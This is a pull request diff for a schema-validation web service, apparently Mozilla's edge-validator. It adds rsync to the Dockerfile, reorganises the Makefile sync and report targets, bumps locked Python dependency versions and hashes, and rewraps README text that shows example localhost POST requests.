### PR TITLE
Fix empty reports due to garbage sent by burp collaborator

### DIFF
--- a/Dockerfile
+++ b/Dockerfile
@@ -12,7 +12,7 @@ EXPOSE $PORT
 
 # Bootstrap the system with root privileges
 RUN apt-get update && \
-    apt-get --yes install make git
+    apt-get --yes install make git rsync
 RUN pip install --upgrade pip
 RUN pip install pipenv
 

--- a/Makefile
+++ b/Makefile
@@ -1,16 +1,17 @@
+.PHONY: build
+
+build:
+	docker build -t edge-validator:latest .
+
 sync:
 	pipenv sync --dev
-	INCLUDE_DATA=false bash sync.sh
+	pipenv run python integration.py sync --ignore-data
 
 test:
 	pipenv run python -m pytest tests/
 
 report:
-	INCLUDE_DATA=true bash sync.sh
-	pipenv run python integration.py report
-
-build:
-	docker build -t edge-validator:latest .
+	pipenv run python integration.py sync report
 
 serve:
 	docker run -e FLASK_ENV -p 8000:8000 -it edge-validator:latest

--- a/Pipfile.lock
+++ b/Pipfile.lock
@@ -33,19 +33,19 @@
         },
         "dockerflow": {
             "hashes": [
-                "sha256:2ea52a904abfda3430ff4f1effc164863b30d2b69f7ecbf92dd672860b0ec423",
-                "sha256:388d02c557968e6957140f7b82f669eac70adf5f570bc7705aa749d220a2e535"
+                "sha256:3342654c419492fa16dc5872546c893433fefce8fd9ba90da9bc9cfcafaecac1",
+                "sha256:885e4e32ebedc87a86c0d9c16fe4797f9ffe70622eb3a056615e37611eb983fd"
             ],
             "index": "pypi",
-            "version": "==2018.4.0"
+            "version": "==2019.6.0"
         },
         "flask": {
             "hashes": [
-                "sha256:2271c0070dbcb5275fad4a82e29f23ab92682dc45f9dfbc22c02ba9b9322ce48",
-                "sha256:a080b744b7e345ccfcbc77954861cb05b3c63786e93f2b3875e0913d44b43f05"
+                "sha256:13f9f196f330c7c2c5d7a5cf91af894110ca0215ac051b5844701f2bfd934d52",
+                "sha256:45eb5a6fd193d6cf7e0cf5d8a5b31f83d5faae0293695626f539a823e93b13f6"
             ],
             "index": "pypi",
-            "version": "==1.0.2"
+            "version": "==1.1.1"
         },
         "itsdangerous": {
             "hashes": [
@@ -56,115 +56,115 @@
         },
         "jinja2": {
             "hashes": [
-                "sha256:74c935a1b8bb9a3947c50a54766a969d4846290e1e788ea44c1392163723c3bd",
-                "sha256:f84be1bb0040caca4cea721fcbbbbd61f9be9464ca236387158b0feea01914a4"
+                "sha256:065c4f02ebe7f7cf559e49ee5a95fb800a9e4528727aec6f24402a5374c65013",
+                "sha256:14dd6caf1527abb21f08f86c784eac40853ba93edb79552aa1e4b8aef1b61c7b"
             ],
-            "version": "==2.10"
+            "version": "==2.10.1"
         },
         "markupsafe": {
             "hashes": [
-                "sha256:048ef924c1623740e70204aa7143ec592504045ae4429b59c30054cb31e3c432",
-                "sha256:130f844e7f5bdd8e9f3f42e7102ef1d49b2e6fdf0d7526df3f87281a532d8c8b",
-                "sha256:19f637c2ac5ae9da8bfd98cef74d64b7e1bb8a63038a3505cd182c3fac5eb4d9",
-                "sha256:1b8a7a87ad1b92bd887568ce54b23565f3fd7018c4180136e1cf412b405a47af",
-                "sha256:1c25694ca680b6919de53a4bb3bdd0602beafc63ff001fea2f2fc16ec3a11834",
-                "sha256:1f19ef5d3908110e1e891deefb5586aae1b49a7440db952454b4e281b41620cd",
-                "sha256:1fa6058938190ebe8290e5cae6c351e14e7bb44505c4a7624555ce57fbbeba0d",
-                "sha256:31cbb1359e8c25f9f48e156e59e2eaad51cd5242c05ed18a8de6dbe85184e4b7",
-                "sha256:3e835d8841ae7863f64e40e19477f7eb398674da6a47f09871673742531e6f4b",
-                "sha256:4e97332c9ce444b0c2c38dd22ddc61c743eb208d916e4265a2a3b575bdccb1d3",
-                "sha256:525396ee324ee2da82919f2ee9c9e73b012f23e7640131dd1b53a90206a0f09c",
-                "sha256:52b07fbc32032c21ad4ab060fec137b76eb804c4b9a1c7c7dc562549306afad2",
-                "sha256:52ccb45e77a1085ec5461cde794e1aa037df79f473cbc69b974e73940655c8d7",
-                "sha256:5c3fbebd7de20ce93103cb3183b47671f2885307df4a17a0ad56a1dd51273d36",
-                "sha256:5e5851969aea17660e55f6a3be00037a25b96a9b44d2083651812c99d53b14d1",
-                "sha256:5edfa27b2d3eefa2210fb2f5d539fbed81722b49f083b2c6566455eb7422fd7e",
-                "sha256:7d263e5770efddf465a9e31b78362d84d015cc894ca2c131901a4445eaa61ee1",
-                "sha256:83381342bfc22b3c8c06f2dd93a505413888694302de25add756254beee8449c",
-                "sha256:857eebb2c1dc60e4219ec8e98dfa19553dae33608237e107db9c6078b1167856",
-                "sha256:98e439297f78fca3a6169fd330fbe88d78b3bb72f967ad9961bcac0d7fdd1550",
-                "sha256:bf54103892a83c64db58125b3f2a43df6d2cb2d28889f14c78519394feb41492",
-                "sha256:d9ac82be533394d341b41d78aca7ed0e0f4ba5a2231602e2f05aa87f25c51672",
-                "sha256:e982fe07ede9fada6ff6705af70514a52beb1b2c3d25d4e873e82114cf3c5401",
-                "sha256:edce2ea7f3dfc981c4ddc97add8a61381d9642dc3273737e756517cc03e84dd6",
-                "sha256:efdc45ef1afc238db84cb4963aa689c0408912a0239b0721cb172b4016eb31d6",
-                "sha256:f137c02498f8b935892d5c0172560d7ab54bc45039de8805075e19079c639a9c",
-                "sha256:f82e347a72f955b7017a39708a3667f106e6ad4d10b25f237396a7115d8ed5fd",
-                "sha256:fb7c206e01ad85ce57feeaaa0bf784b97fa3cad0d4a5737bc5295785f5c613a1"
+                "sha256:00bc623926325b26bb9605ae9eae8a215691f33cae5df11ca5424f06f2d1f473",
+                "sha256:09027a7803a62ca78792ad89403b1b7a73a01c8cb65909cd876f7fcebd79b161",
+                "sha256:09c4b7f37d6c648cb13f9230d847adf22f8171b1ccc4d5682398e77f40309235",
+                "sha256:1027c282dad077d0bae18be6794e6b6b8c91d58ed8a8d89a89d59693b9131db5",
+                "sha256:24982cc2533820871eba85ba648cd53d8623687ff11cbb805be4ff7b4c971aff",
+                "sha256:29872e92839765e546828bb7754a68c418d927cd064fd4708fab9fe9c8bb116b",
+                "sha256:43a55c2930bbc139570ac2452adf3d70cdbb3cfe5912c71cdce1c2c6bbd9c5d1",
+                "sha256:46c99d2de99945ec5cb54f23c8cd5689f6d7177305ebff350a58ce5f8de1669e",
+                "sha256:500d4957e52ddc3351cabf489e79c91c17f6e0899158447047588650b5e69183",
+                "sha256:535f6fc4d397c1563d08b88e485c3496cf5784e927af890fb3c3aac7f933ec66",
+                "sha256:62fe6c95e3ec8a7fad637b7f3d372c15ec1caa01ab47926cfdf7a75b40e0eac1",
+                "sha256:6dd73240d2af64df90aa7c4e7481e23825ea70af4b4922f8ede5b9e35f78a3b1",
+                "sha256:717ba8fe3ae9cc0006d7c451f0bb265ee07739daf76355d06366154ee68d221e",
+                "sha256:79855e1c5b8da654cf486b830bd42c06e8780cea587384cf6545b7d9ac013a0b",
+                "sha256:7c1699dfe0cf8ff607dbdcc1e9b9af1755371f92a68f706051cc8c37d447c905",
+                "sha256:88e5fcfb52ee7b911e8bb6d6aa2fd21fbecc674eadd44118a9cc3863f938e735",
+                "sha256:8defac2f2ccd6805ebf65f5eeb132adcf2ab57aa11fdf4c0dd5169a004710e7d",
+                "sha256:98c7086708b163d425c67c7a91bad6e466bb99d797aa64f965e9d25c12111a5e",
+                "sha256:9add70b36c5666a2ed02b43b335fe19002ee5235efd4b8a89bfcf9005bebac0d",
+                "sha256:9bf40443012702a1d2070043cb6291650a0841ece432556f784f004937f0f32c",
+                "sha256:ade5e387d2ad0d7ebf59146cc00c8044acbd863725f887353a10df825fc8ae21",
+                "sha256:b00c1de48212e4cc9603895652c5c410df699856a2853135b3967591e4beebc2",
+                "sha256:b1282f8c00509d99fef04d8ba936b156d419be841854fe901d8ae224c59f0be5",
+                "sha256:b2051432115498d3562c084a49bba65d97cf251f5a331c64a12ee7e04dacc51b",
+                "sha256:ba59edeaa2fc6114428f1637ffff42da1e311e29382d81b339c1817d37ec93c6",
+                "sha256:c8716a48d94b06bb3b2524c2b77e055fb313aeb4ea620c8dd03a105574ba704f",
+                "sha256:cd5df75523866410809ca100dc9681e301e3c27567cf498077e8551b6d20e42f",
+                "sha256:e249096428b3ae81b08327a63a485ad0878de3fb939049038579ac0ef61e17e7"
             ],
-            "version": "==1.1.0"
+            "version": "==1.1.1"
         },
         "python-rapidjson": {
             "hashes": [
-                "sha256:0156939b77d7a4f2ef5f627cabbfcae52f993325626cefc783fe529d42092f51",
-                "sha256:0a7729c711d9be2b6c0638ce4851d398e181f2329814668aa7fda6421a5da085",
-                "sha256:0cddd7afb5f95d7966836e93a8eae5e31f38e602b57ba6749f9f14473c09470b",
-                "sha256:1b5990989d446e1dbffa87e60b38043a9e5fc28ded970d3776d06e3ae68d1eb6",
-                "sha256:209e9d9b813641a7bc5ead254f4dfe3a2b43f39ca16eabb36e6b796316cc5a49",
-                "sha256:2241e6b0ba4e9bec139e97f6d9f17e9d308de905d66bf5cf88c5636193474a5f",
-                "sha256:2cdd343ec844ec06c6819c79cb83c3ba52b12bb421923ddfdf94f1e233b09d34",
-                "sha256:4066a69fb074262d2309abe0436630241ca5be5e3c23147c178a138c944ffeba",
-                "sha256:626bdea30d3029c3069f5a5b324e8f92f775ae7bb90568022a93f8906954518a",
-                "sha256:7785ebc48f66386fe185a2034050a3db493d2b2ac6f01f4504b38f663e2136f9",
-                "sha256:77caf809475356690152ee5931380e54cafe7202838e220608794987837a1014",
-                "sha256:784a13b6af5380ccd6dcafbf19fef78bd1028f0c4356be810c1edfbe99e08d07",
-                "sha256:7abb51dac9092450e31b874f9f02e141cd42a7ebc6ce2ed3191891c53da976a8",
-                "sha256:9ca153a4a5f9c1c5774ebec085d6775124dbbf0f7bf3894dec2cbc0910963a8f",
-                "sha256:a55a386f87213b1cc69bb4979eb6a77a1f149216f0514adeb06ac0e8fb7e3904",
-                "sha256:b844728f6a932e50ea6650d2207e81506c20a3d318651ed7b86ed101b75f50dd",
-                "sha256:bd20cd2e6a31a5b42da6c204fe453f67468e862d34f5d678d0df4195ac8039c2",
-                "sha256:f1201cadb61ce05a9ec896c4f0e4365d2500894990cf8c885e271acdb4038b95",
-                "sha256:f32fda807dea4805b1b93affbde1af7a06119e5828b81eb71a04fa0580c6e5ad",
-                "sha256:f4a3a20321e7b5bd7a3fe9451cc4437c1c6a221dc31784a1fc4de5613eccaab3",
-                "sha256:f7fff2a22754c4d1b9a34f16d124d92f414f2472d043a652a83b911b3736735e"
+                "sha256:0710751aaf31738c102f41af4330b62df8023914ce9481244a2b3cc964776ceb",
+                "sha256:090a0c8604759a47db56fad0a7817eaa072bb7eb3aa76f71a4fa6c58c1302b74",
+                "sha256:0d32c2b0f5fc2b29f8317ec77ae141655814fe151ef530adb007b33f8b48abdf",
+                "sha256:14929156740a37bc3ec18aa6ac8b17013f4e9ecf2f2ac31267b8b4d601654ea4",
+                "sha256:16d7cbf00709a8d849359fa41c5cd462354af1dea10d9e1fe6e2865c36d533ec",
+                "sha256:1a6e6e023a42b48f3a440723cca8cc16be3a5db9ea8f5c3e48aa63bc2d5fe79f",
+                "sha256:2c639e8f064a1bfa8285fec1cd72361a5ccd8adc64497ab9f9e3799edbbc5694",
+                "sha256:3656dba8038ec08fa6aec1ccb9b8b04e4f3d747c41ae2a63a3b40076653d7439",
+                "sha256:3e15b1fda6f8b4dc15528c473d1bdb178b942c260a7822f112292059228cf057",
+                "sha256:467ca7ee00f20683161c868ce16a3deb68b233a4a4fcc072b41f1cb7c89171f4",
+                "sha256:6a09c0bb905fdc30527c0147ba530b26f3091ecdba19eb1aa4a6c0fcfa4230ee",
+                "sha256:795e3a0fdaccbf229b7b2b78f2f2b83a6884a6f3690ae49e64e90465401b1a9b",
+                "sha256:7bf4c40ad402eacce5a4e80f4bfb39e38fa9662a95c2a58f3f497f590bfd1c7d",
+                "sha256:7d38228984ced0a95da469e5f77c5affb67fc6c6dd2214fd738af63d386fc48a",
+                "sha256:93804ffffda7bb7db43cd3d736623805adf147372eed4d10ce9464663881acf3",
+                "sha256:94a25d52c434439afb6a64930a4dd3ea85fbcbb164a7bddea3ade3552c7e877e",
+                "sha256:9c62b96d22203f58183e3cebdbcab407babbad13ed6ccc8b3fd461d9c475157f",
+                "sha256:af97a0c37747bf9b9e0176394ebbfe2bb8543eecff91d38824dafbd27fef4a20",
+                "sha256:c745bbac3047d9d2dd6dc55d7fdfc34bb08f40a1873ac8c8e2a5bf9a144fb1e5",
+                "sha256:eaf930000666aabdb62253201f291406e1dc407655788d8074c91ba361fb1909",
+                "sha256:fd665648dc3b4416ceafb7dc155061b639a350c28650b3d028f769a91184ce69"
             ],
             "index": "pypi",
-            "version": "==0.6.3"
+            "version": "==0.7.2"
         },
         "werkzeug": {
             "hashes": [
-                "sha256:c3fd7a7d41976d9f44db327260e263132466836cef6f91512889ed60ad26557c",
-                "sha256:d5da73735293558eb1651ee2fddc4d0dedcfa06538b8813a2e20011583c9e49b"
+                "sha256:87ae4e5b5366da2347eb3116c0e6c681a0e939a33b2805e2c0cbd282664932c4",
+                "sha256:a13b74dd3c45f758d4ebdb224be8f1ab8ef58b3c0ffc1783a8c7d9f4f50227e6"
             ],
-            "version": "==0.14.1"
+            "version": "==0.15.5"
         }
     },
     "develop": {
         "atomicwrites": {
             "hashes": [
-                "sha256:0312ad34fcad8fac3704d441f7b317e50af620823353ec657a53e981f92920c0",
-                "sha256:ec9ae8adaae229e4f8446952d204a3e4b5fdd2d099f9be3aaf556120135fb3ee"
+                "sha256:03472c30eb2c5d1ba9227e4c2ca66ab8287fbfbbda3888aa93dc2e28fc6811b4",
+                "sha256:75a9445bac02d8d058d5e1fe689654ba5a6556a1dfd8ce6ec55a0ed79866cfa6"
             ],
-            "version": "==1.2.1"
+            "version": "==1.3.0"
         },
         "attrs": {
             "hashes": [
-                "sha256:10cbf6e27dbce8c30807caf056c8eb50917e0eaafe86347671b57254006c3e69",
-                "sha256:ca4be454458f9dec299268d472aaa5a11f67a4ff70093396e1ceae9c76cf4bbb"
+                "sha256:69c0dbf2ed392de1cb5ec704444b08a5ef81680a61cb899dc08127123af36a79",
+                "sha256:f0b870f674851ecbfbbbd364d6b5cbdff9dcedbc7f3f5e18a6891057f21fe399"
             ],
-            "version": "==18.2.0"
+            "version": "==19.1.0"
         },
         "awscli": {
             "hashes": [
-                "sha256:3eae631655c49c2e71355b43a4e69e10abdb709186f74d19112a0842c4155299",
-                "sha256:bbc4895d8c67bd2f0a5f854953b280b2eb39014431ca640cb8b2594c10f3c2ec"
+                "sha256:c1190b8ee8ec1f8bc6ccaec30a7abd1fc6481407665c6dcbf03daade8be179ef",
+                "sha256:f800c2068570f47a4609c8590a5926650c158835cca45005c89e93162b0de0c3"
             ],
             "index": "pypi",
-            "version": "==1.16.76"
+            "version": "==1.16.201"
         },
         "botocore": {
             "hashes": [
-                "sha256:25c39ecc71356287cf79d66981ec77deca374e28043b19b2f818d48aa34272a1",
-                "sha256:419e1a6a1829c49c7aad30efc1e4a9435ad36573ca6a14d94940e7f302aa234a"
+                "sha256:6f609214e358d602a927af375e851af8edff0fb7dcdc0f9790416936eded0442",
+                "sha256:971bfcce68b0c92cb8ff6c43a080a2baa07f0f6809582d758da19c14fc039da0"
             ],
-            "version": "==1.12.66"
+            "version": "==1.12.191"
         },
         "certifi": {
             "hashes": [
-                "sha256:47f9c83ef4c0c621eaef743f133f09fa8a74a9b75f037e8624f83bd1b6626cb7",
-                "sha256:993f830721089fef441cdfeb4b2c8c9df86f0c63239f06bd025a76a7daddb033"
+                "sha256:046832c04d4e752f37383b628bc601a7ea7211496b4638f6514d0e5b9acc4939",
+                "sha256:945e3ba63a0b9f577b1395204e13c3a231f9bc0223888be653286534e5873695"
             ],
-            "version": "==2018.11.29"
+            "version": "==2019.6.16"
         },
         "chardet": {
             "hashes": [
@@ -182,18 +182,11 @@
         },
         "docker": {
             "hashes": [
-                "sha256:145c673f531df772a957bd1ebc49fc5a366bcd55efa0e64bbd029f5cc7a1fd8e",
-                "sha256:666611862edded75f6049893f779bff629fdcd4cd21ccf01d648626e709adb13"
+                "sha256:acf51b5e3e0d056925c3b780067a6f753c915fffaa46c5f2d79eb0fc1cbe6a01",
+                "sha256:cc5b2e94af6a2b1e1ed9d7dcbdc77eff56c36081757baf9ada6e878ea0213164"
             ],
             "index": "pypi",
-            "version": "==3.6.0"
-        },
-        "docker-pycreds": {
-            "hashes": [
-                "sha256:6ce3270bcaf404cc4c3e27e4b6c70d3521deae82fb508767870fdbf772d584d4",
-                "sha256:7266112468627868005106ec19cd0d722702d2b7d5912a28e19b826c3d37af49"
-            ],
-            "version": "==0.4.0"
+            "version": "==4.0.2"
         },
         "docutils": {
             "hashes": [
@@ -210,92 +203,102 @@
             ],
             "version": "==2.8"
         },
+        "importlib-metadata": {
+            "hashes": [
+                "sha256:6dfd58dfe281e8d240937776065dd3624ad5469c835248219bd16cf2e12dbeb7",
+                "sha256:cb6ee23b46173539939964df59d3d72c3e0c1b5d54b84f1d8a7e912fe43612db"
+            ],
+            "version": "==0.18"
+        },
         "jmespath": {
             "hashes": [
-                "sha256:6a81d4c9aa62caf061cb517b4d9ad1dd300374cd4706997aff9cd6aedd61fc64",
-                "sha256:f11b4461f425740a1d908e9a3f7365c3d2e569f6ca68a2ff8bc5bcd9676edd63"
+                "sha256:3720a4b1bd659dd2eecad0666459b9788813e032b83e7ba58578e48254e0a0e6",
+                "sha256:bde2aef6f44302dfb30320115b17d030798de8c4110e28d5cf6cf91a7a31074c"
             ],
-            "version": "==0.9.3"
+            "version": "==0.9.4"
         },
         "more-itertools": {
             "hashes": [
-                "sha256:c187a73da93e7a8acc0001572aebc7e3c69daf7bf6881a2cea10650bd4420092",
-                "sha256:c476b5d3a34e12d40130bc2f935028b5f636df8f372dc2c1c01dc19681b2039e",
-                "sha256:fcbfeaea0be121980e15bc97b3817b5202ca73d0eae185b4550cbfce2a3ebb3d"
+                "sha256:3ad685ff8512bf6dc5a8b82ebf73543999b657eded8c11803d9ba6b648986f4d",
+                "sha256:8bb43d1f51ecef60d81854af61a3a880555a14643691cc4b64a6ee269c78f09a"
             ],
-            "version": "==4.3.0"
+            "version": "==7.1.0"
+        },
+        "packaging": {
+            "hashes": [
+                "sha256:0c98a5d0be38ed775798ece1b9727178c4469d9c3b4ada66e8e6b7849f8732af",
+                "sha256:9e1cbf8c12b1f1ce0bb5344b8d7ecf66a6f8a6e91bcb0c84593ed6d3ab5c4ab3"
+            ],
+            "version": "==19.0"
         },
         "pluggy": {
             "hashes": [
-                "sha256:447ba94990e8014ee25ec853339faf7b0fc8050cdc3289d4d71f7f410fb90095",
-                "sha256:bde19360a8ec4dfd8a20dcb811780a30998101f078fc7ded6162f0076f50508f"
+                "sha256:0825a152ac059776623854c1543d65a4ad408eb3d33ee114dff91e57ec6ae6fc",
+                "sha256:b9817417e95936bf75d85d3f8767f7df6cdde751fc40aed3bb3074cbcb77757c"
             ],
-            "version": "==0.8.0"
+            "version": "==0.12.0"
         },
         "py": {
             "hashes": [
-                "sha256:bf92637198836372b520efcba9e020c330123be8ce527e535d185ed4b6f45694",
-                "sha256:e76826342cefe3c3d5f7e8ee4316b80d1dd8a300781612ddbc765c17ba25a6c6"
+                "sha256:64f65755aee5b381cea27766a3a147c3f15b9b6b9ac88676de66ba2ae36793fa",
+                "sha256:dc639b046a6e2cff5bbe40194ad65936d6ba360b52b3c3fe1d08a82dd50b5e53"
             ],
-            "version": "==1.7.0"
+            "version": "==1.8.0"
         },
         "pyasn1": {
             "hashes": [
-                "sha256:0ad0fe0593dde1e599cac0bf65bb1a4ec663032f0bc68ee44850db4251e8c501",
-                "sha256:13794d835643ee970b2c059dbfe4eb5d751e16c693c8baee61c526abd209e5c7",
-                "sha256:49a8ed515f26913049113820b462f698e6ed26df62c389dafb6fa3685ddca8de",
-                "sha256:74ac8521a0480f228549be20bea555ae35678f0e754c2fbc6f1576b0959bec43",
-                "sha256:89399ca8ecd4524f974e926d4ef9e7a787903e01f0a9cdff3131ad1361792fe5",
-                "sha256:8f291e0338d519a1a0d07f0b9d03c9265f6be26eb32fdd21af6d3259d14ea49c",
-                "sha256:b9d3abc5031e61927c82d4d96c1cec1e55676c1a991623cfed28faea73cdd7ca",
-                "sha256:d3bbd726c1a760d4ca596a4d450c380b81737612fe0182f5bb3caebc17461fd9",
-                "sha256:dea873d6c907c1cf1341fd88742a61efce33227d7743cb37564ab7d7e77dd9fd",
-                "sha256:ded5eea5cb88bc1ce9aa074b5a3092f95ce4741887e317e9b49c7ece75d7ea0e",
-                "sha256:e8b69ea2200d42201cbedd486eedb8980f320d4534f83ce2fb468e96aa5545d0",
-                "sha256:edad117649643230493aeb4955456ce19ab4b12e94489dde6f7094cdb5a3c87e",
-                "sha256:f58f2a3d12fd754aa123e9fa74fb7345333000a035f3921dbdaa08597aa53137"
+                "sha256:da2420fe13a9452d8ae97a0e478adde1dee153b11ba832a95b223a2ba01c10f7",
+                "sha256:da6b43a8c9ae93bc80e2739efb38cc776ba74a886e3e9318d65fe81a8b8a2c6e"
             ],
-            "version": "==0.4.4"
+            "version": "==0.4.5"
+        },
+        "pyparsing": {
+            "hashes": [
+                "sha256:1873c03321fc118f4e9746baf201ff990ceb915f433f23b395f5580d1840cb2a",
+                "sha256:9b6323ef4ab914af344ba97510e966d64ba91055d6b9afa6b30799340e89cc03"
+            ],
+            "version": "==2.4.0"
         },
         "pytest": {
             "hashes": [
-                "sha256:f689bf2fc18c4585403348dd56f47d87780bf217c53ed9ae7a3e2d7faa45f8e9",
-                "sha256:f812ea39a0153566be53d88f8de94839db1e8a05352ed8a49525d7d7f37861e9"
+                "sha256:6ef6d06de77ce2961156013e9dff62f1b2688aa04d0dc244299fe7d67e09370d",
+                "sha256:a736fed91c12681a7b34617c8fcefe39ea04599ca72c608751c31d89579a3f77"
             ],
             "index": "pypi",
-            "version": "==4.0.2"
+            "version": "==5.0.1"
         },
         "python-dateutil": {
             "hashes": [
-                "sha256:063df5763652e21de43de7d9e00ccf239f953a832941e37be541614732cdfc93",
-                "sha256:88f9287c0174266bb0d8cedd395cfba9c58e87e5ad86b2ce58859bc11be3cf02"
+                "sha256:7e6584c74aeed623791615e26efd690f29817a27c73085b78e4bad02493df2fb",
+                "sha256:c89805f6f4d64db21ed966fda138f8a5ed7a4fdbc1a8ee329ce1b74e3c74da9e"
             ],
             "markers": "python_version >= '2.7'",
-            "version": "==2.7.5"
+            "version": "==2.8.0"
         },
         "pyyaml": {
             "hashes": [
-                "sha256:3d7da3009c0f3e783b2c873687652d83b1bbfd5c88e9813fb7e5b03c0dd3108b",
-                "sha256:3ef3092145e9b70e3ddd2c7ad59bdd0252a94dfe3949721633e41344de00a6bf",
-                "sha256:40c71b8e076d0550b2e6380bada1f1cd1017b882f7e16f09a65be98e017f211a",
-                "sha256:558dd60b890ba8fd982e05941927a3911dc409a63dcb8b634feaa0cda69330d3",
-                "sha256:a7c28b45d9f99102fa092bb213aa12e0aaf9a6a1f5e395d36166639c1f96c3a1",
-                "sha256:aa7dd4a6a427aed7df6fb7f08a580d68d9b118d90310374716ae90b710280af1",
-                "sha256:bc558586e6045763782014934bfaf39d48b8ae85a2713117d16c39864085c613",
-                "sha256:d46d7982b62e0729ad0175a9bc7e10a566fc07b224d2c79fafb5e032727eaa04",
-                "sha256:d5eef459e30b09f5a098b9cea68bebfeb268697f78d647bd255a085371ac7f3f",
-                "sha256:e01d3203230e1786cd91ccfdc8f8454c8069c91bee3962ad93b87a4b2860f537",
-                "sha256:e170a9e6fcfd19021dd29845af83bb79236068bf5fd4df3327c1be18182b2531"
+                "sha256:1adecc22f88d38052fb787d959f003811ca858b799590a5eaa70e63dca50308c",
+                "sha256:436bc774ecf7c103814098159fbb84c2715d25980175292c648f2da143909f95",
+                "sha256:460a5a4248763f6f37ea225d19d5c205677d8d525f6a83357ca622ed541830c2",
+                "sha256:5a22a9c84653debfbf198d02fe592c176ea548cccce47553f35f466e15cf2fd4",
+                "sha256:7a5d3f26b89d688db27822343dfa25c599627bc92093e788956372285c6298ad",
+                "sha256:9372b04a02080752d9e6f990179a4ab840227c6e2ce15b95e1278456664cf2ba",
+                "sha256:a5dcbebee834eaddf3fa7366316b880ff4062e4bcc9787b78c7fbb4a26ff2dd1",
+                "sha256:aee5bab92a176e7cd034e57f46e9df9a9862a71f8f37cad167c6fc74c65f5b4e",
+                "sha256:c51f642898c0bacd335fc119da60baae0824f2cde95b0330b56c0553439f0673",
+                "sha256:c68ea4d3ba1705da1e0d85da6684ac657912679a649e8868bd850d2c299cce13",
+                "sha256:e23d0cc5299223dcc37885dae624f382297717e459ea24053709675a976a3e19"
             ],
-            "version": "==3.13"
+            "markers": "python_version != '2.6'",
+            "version": "==5.1"
         },
         "requests": {
             "hashes": [
-                "sha256:502a824f31acdacb3a35b6690b5fbf0bc41d63a24a45c4004352b0242707598e",
-                "sha256:7bf2a778576d825600030a110f3c0e3e8edc51dfaafe1c146e39a2027784957b"
+                "sha256:11e007a8a2aa0323f5a921e9e6a2d7e4e67d9877e85773fba9ba6419025cbeb4",
+                "sha256:9cf5292fcd0f598c671cfc1e0d7d1a7f13bb8085e9a590f48c010551dc6c4b31"
             ],
             "index": "pypi",
-            "version": "==2.21.0"
+            "version": "==2.22.0"
         },
         "rsa": {
             "hashes": [
@@ -306,10 +309,10 @@
         },
         "s3transfer": {
             "hashes": [
-                "sha256:90dc18e028989c609146e241ea153250be451e05ecc0c2832565231dacdf59c1",
-                "sha256:c7a9ec356982d5e9ab2d4b46391a7d6a950e2b04c472419f5fdec70cc0ada72f"
+                "sha256:6efc926738a3cd576c2a79725fed9afde92378aa5c6a957e3af010cb019fac9d",
+                "sha256:b780f2411b824cb541dbcd2c713d0cb61c7d1bcadae204cdddda2b35cef493ba"
             ],
-            "version": "==0.1.13"
+            "version": "==0.2.1"
         },
         "six": {
             "hashes": [
@@ -320,17 +323,32 @@
         },
         "urllib3": {
             "hashes": [
-                "sha256:61bf29cada3fc2fbefad4fdf059ea4bd1b4a86d2b6d15e1c7c0b582b9752fe39",
-                "sha256:de9529817c93f27c8ccbfead6985011db27bd0ddfcdb2d86f3f663385c6a9c22"
+                "sha256:b246607a25ac80bedac05c6f282e3cdaf3afb65420fd024ac94435cabe6e18d1",
+                "sha256:dbe59173209418ae49d485b87d1681aefa36252ee85884c31346debd19463232"
             ],
-            "version": "==1.24.1"
+            "markers": "python_version >= '3.4'",
+            "version": "==1.25.3"
+        },
+        "wcwidth": {
+            "hashes": [
+                "sha256:3df37372226d6e63e1b1e1eda15c594bca98a22d33a23832a90998faa96bc65e",
+                "sha256:f4ebe71925af7b40a864553f761ed559b43544f8f71746c2d756c7fe788ade7c"
+            ],
+            "version": "==0.1.7"
         },
         "websocket-client": {
             "hashes": [
-                "sha256:8c8bf2d4f800c3ed952df206b18c28f7070d9e3dcbd6ca6291127574f57ee786",
-                "sha256:e51562c91ddb8148e791f0155fdb01325d99bb52c4cdbb291aee7a3563fd0849"
+                "sha256:1151d5fb3a62dc129164292e1227655e4bbc5dd5340a5165dfae61128ec50aa9",
+                "sha256:1fd5520878b68b84b5748bb30e592b10d0a91529d5383f74f4964e72b297fd3a"
             ],
-            "version": "==0.54.0"
+            "version": "==0.56.0"
+        },
+        "zipp": {
+            "hashes": [
+                "sha256:4970c3758f4e89a7857a973b1e2a5d75bcdc47794442f2e2dd4fe8e0466e809a",
+                "sha256:8a5712cfd3bb4248015eb3b0b3c54a5f6ee3f2425963ef2a0125b8bc40aafaec"
+            ],
+            "version": "==0.5.2"
         }
     }
 }

--- a/README.md
+++ b/README.md
@@ -4,18 +4,20 @@ A service-endpoint for validating pings against `mozilla-pipeline-schemas`.
 
 [![CircleCI](https://circleci.com/gh/mozilla-services/edge-validator.svg?style=svg)](https://circleci.com/gh/mozilla-services/edge-validator)
 
-See [bug 1452166](https://bugzilla.mozilla.org/show_bug.cgi?id=1452166) for motivating background.
+See [bug 1452166](https://bugzilla.mozilla.org/show_bug.cgi?id=1452166) for
+motivating background.
 
 ## Quickstart
 
-Start the docker container to start the local service at `localhost:8000`.
-The following command will fetch the latest image from dockerhub.
+Start the docker container to start the local service at `localhost:8000`. The
+following command will fetch the latest image from DockerHub.
+
 ```bash
 docker run -p 8000 -it mozilla/edge-validator:latest
 ```
 
-Simply POST to the endpoint to check if a document is valid.
-The `testing` namespace has an example schema for validation.
+Simply POST to the endpoint to check if a document is valid. The `testing`
+namespace has an example schema for validation.
 
 ```bash
 $ OK_DATA="$(echo '{"payload": {"foo": true, "bar": 1, "baz": "hello world"}}')"
@@ -23,10 +25,10 @@ $ curl -X POST -H "Content-Type: application/json" -d "${OK_DATA}" localhost:800
 > OK
 ```
 
-The endpoint will return `200 OK` on a successful POST.
-The response will be `400 BAD` if the posted documented does not pass validation.
-If the URI is malformed, the validator may return with a `404 NOT FOUND`.
-The status will also include the exception that caused the error.
+The endpoint will return `200 OK` on a successful POST. The response will be
+`400 BAD` if the posted documented does not pass validation. If the URI is
+malformed, the validator may return with a `404 NOT FOUND`. The status will also
+include the exception that caused the error.
 
 ```bash
 $ BAD_DATA="$(echo '{"payload": {"foo": null, "bar": "3", "baz": 55}}')"
@@ -34,46 +36,51 @@ $ curl -X POST -H "Content-Type: application/json" -d "${BAD_DATA}" localhost:80
 > BAD: ('type', '#/properties/payload/properties/foo', '#/payload/foo')
 ```
 
-In this example, `payload.foo` should be a boolean and `payload.baz` should be a string.
-Currently, only the first validation exception will be propagated to the user.
+In this example, `payload.foo` should be a boolean and `payload.baz` should be a
+string. Currently, only the first validation exception will be propagated to the
+user.
 
-
-The exposed port can be changed through the `PORT` environment variable.
